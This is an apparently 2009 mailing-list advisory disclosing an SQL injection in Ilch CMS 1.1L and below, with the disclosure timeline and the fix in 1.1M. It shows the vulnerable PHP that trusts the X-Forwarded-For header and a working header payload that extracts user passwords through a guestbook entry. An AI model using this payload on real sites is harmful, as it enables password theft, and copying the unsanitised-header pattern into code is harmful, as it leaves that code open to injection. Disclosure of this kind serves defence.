<<< Date Index >>>     <<< Thread Index >>>

Vulnerable: Ilch CMS



Ilch CMS (from http://ilch.de) is vulnerable to sql-injection

Prone to the vulnerabilty are the guestbook and the statistics.

- Affected Versions: ilch 1.1L and below
- Not vulnerable: ilch 1.1M

- Exploit: Spoof your x-forwarded-for header to:

127.0.0.1', (select `pass` from prefix_user WHERE `id` > 0 ORDER BY `id` LIMIT 1)) /*

           Then create a guestbook entry.

- Timeline:
    3.Feb.09: Vuln reported to ilch.de
    3.Feb.09: Got reply from ilch
    4.Feb.09: Version 1.1M is available which fixes the issue



Here is a summary of the vulnerability:

# in include/includes/func/statistics.php is missing user input sanitization:

function getip() {
  if ($_SERVER["HTTP_X_FORWARDED_FOR"]) {
     return ($_SERVER["HTTP_X_FORWARDED_FOR"]);
  } else {
     return ($_SERVER["REMOTE_ADDR"]);
  }
}

# in include/contents/gbook.php getip() is used without validation

db_query("INSERT INTO prefix_gbook (`name`,`mail`,`page`,`time`,`ip`,`txt`) VALUES ('".$name."', '".$mail."', '".$page."', '".time()."', '".getip()."', '".$txt."')");

# There is also getip() used in includes/func/user.php, but its way harder to exploit:

db_query("INSERT INTO prefix_online (sid,uptime,ipa) VALUES ('".session_id()."',now(),'".getip()."')");



Please credit the discovery to Gizmore from wechall.net :)

Kind Regards
Gizmore